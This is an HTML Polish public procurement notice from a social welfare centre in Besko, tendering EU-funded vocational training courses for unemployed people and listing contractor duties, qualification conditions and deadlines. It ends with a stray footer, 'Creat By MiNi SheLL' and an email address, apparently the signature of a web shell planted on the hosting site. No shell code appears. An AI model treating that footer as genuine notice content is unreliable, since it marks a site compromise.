(m.in. listy obecności uczestników zajęć - potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu, potwierdzenia odbioru materiałów szkoleniowych, potwierdzenia otrzymania zimnego oraz gorącego poczęstunku w postaci gorącego posiłku, potwierdzenia odbycia kursu BHP) a po zakończeniu kursu przekazania kserokopii tych dokumentów Zamawiającemu wraz z zaświadczeniami potwierdzającymi ukończenie kursu (z odpowiednim oznakowaniem promocyjnym) 10. Niezwłoczne poinformowanie Zamawiającego (najpóźniej w następnym dniu od zaistniałej sytuacji) o absencji uczestników szkolenia lub rezygnacji z uczestnictwa w trakcie jego trwania a także innych okoliczności mających wpływ na realizację programu nauczania. Zgłoszenia o nieobecności uczestników powinny być dokonane telefonicznie lub e-mailowo do koordynatora projektu. 11. Powiadomienie Zamawiającego, na co najmniej 3 dni przed terminem zakończenia szkolenia, o dacie i godzinie egzaminu sprawdzającego wiadomości i umiejętności uczestników i umożliwienie Zamawiającemu uczestnictwo w egzaminie w charakterze obserwatora, 12. Sprawdzenie wiadomości i umiejętności z poszczególnych zajęć edukacyjnych przewidzianych w programie nauczania tego szkolenia i wydanie egzemplarza imiennego zaświadczenia lub certyfikatu potwierdzającego ukończenie szkolenia (z odpowiednim oznakowaniem promocyjnym). Potwierdzoną za zgodność kopię w/w dokumentu Wykonawca jest zobowiązany przekazać Zamawiającemu w terminie 3 dni od ukończenia kursu. 13. Przeprowadzenie krótkiego instruktarzu BHP na początku szkolenia 14. Przekazywanie Zamawiającemu harmonogramu zajęć wraz z godzinami rozpoczęcia i zakończenia szkolenia na 4 dni przed rozpoczęciem kursu. 15. Wykonawca musi przed rozpoczęciem kursu oznakować pomieszczenie, materiały szkoleniowe i środki techniczne, wszystkie dokumenty sporządzone na potrzeby kursu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki . 16. Po zakończeniu szkolenia uczestnicy otrzymają dokumenty potwierdzające jego ukończenie - zaświadczenie, o którym mowa w § 18 ust. 2 rozporządzenia Ministra Edukacji i Nauki z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r., poz. 622) oraz suplement zawierający: 1. informacje o okresie trwania szkolenia, 2. tematy i wymiar godzinowy zajęć edukacyjnych, 3. numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, 4. podpis osoby upoważnionej przez instytucję szkoleniową prowadzącą szkolenie. Zaświadczenia muszą być oznaczone zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że są wpisani do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę instytucji szkoleniowej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, na rzecz osób bezrobotnych, co najmniej po dwie usługi szkoleniowe w każdym z wymienionych zakresów: a) Kucharz - ciastkarz; z elementami cateringu b) Magazynier z obsługą wózka widłowego, c) Obsługa kasy fiskalnej; d) Drwal-operator pilarki spalinowej; e) Sprzedawca z obsługą pakietu MS Office oraz programu magazynowego. Każda z usług szkoleniowych ma być zrealizowana w wymiarze co najmniej 100 godzin dydaktycznych ( obsługa kasy fiskalnej co najmniej 30 godzin dydaktycznych) gdzie 1 godz. dydaktyczna = co najmniej 45 min. zegarowych) i każda ma być zrealizowana dla co najmniej 1 osoby. Usługi te (zakresy tematyczne) mogły być realizowane w ramach wielu umów lub w ramach jednej umowy. Posiadane doświadczenie powinno być udokumentowane złożeniem wykazu zrealizowanych usług zgodnie ze wzorem stanowiącym Załącznik nr 4 do SIWZ wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Wykonawcy winni udokumentować dysponowanie szkoleniowcami posiadającymi doświadczenie przy przeprowadzeniu co najmniej 3 kursów ( każdy) dla osób bezrobotnych, w wymiarze co najmniej 50 godz. dydaktycznych każdy z kursów( obsługa kasy fiskalnej co najmniej 30 godzin dydaktycznych) , w każdym z zakresów odpowiadających przedmiotowi zamówienia określonemu w pkt. 3.2 SIWZ ( tj. kucharz - ciastkarz z elementami Cateringu; magazynier z obsługą wózka widłowego, obsługa kasy fiskalnej; Drwal - operator pilarki spalinowej;Sprzedawca z obsługą pakietu MS Office oraz programu magazynowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany treści Umowy w przypadku, gdy: 1)nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy; 2.wystąpi konieczność zmiany miejsca i terminów realizacji szkoleń, wyłącznie w przypadku zaistnienia nowych okoliczności, niezależnych od Zamawiającego i Wykonawcy, 3.Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gops.besko.pl/asp/pl_start.asp?ref=1&typ=13&menu=3&strona=1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Besku ul. Podkarpacka 5 , 38-524 Besko, pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2015 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Besku ul. Podkarpacka 5 , 38-524 Besko, pokój nr 6...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu systemowego Czas na aktywność w gminie Besko realizowanego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, dofinansowanego ze środków UNII EUROPEJSKIEJ w ramach EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com